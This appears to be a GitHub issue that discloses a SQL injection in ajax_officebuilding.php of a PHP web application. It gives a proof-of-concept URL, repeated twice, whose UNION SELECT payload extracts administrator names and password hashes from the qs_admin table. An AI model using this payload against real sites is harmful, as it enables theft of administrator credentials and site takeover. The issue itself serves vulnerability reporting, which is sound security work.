exactly the same as what happend to ajax_street.php
x pass to alphabet and get in within a sql expression without filter ,so leads to sql inject
poc the same : /plus/ajax_officebuilding.php?act=alphabet&x=11�' union select 1,2,3,concat(0x3C2F613E20),5,6,7,concat(0x4E56535F544553542D2D,admin_name,0x3A,pwd,0x2D2D4E56535F54455354),9 from qs_admin#
The text was updated successfully, but these errors were encountered:
upload/plus/ajax_officebuilding.php

exactly the same as what happend to ajax_street.php
x pass to alphabet and get in within a sql expression without filter ,so leads to sql inject
poc the same :
/plus/ajax_officebuilding.php?act=alphabet&x=11�' union select 1,2,3,concat(0x3C2F613E20),5,6,7,concat(0x4E56535F544553542D2D,admin_name,0x3A,pwd,0x2D2D4E56535F54455354),9 from qs_admin#The text was updated successfully, but these errors were encountered: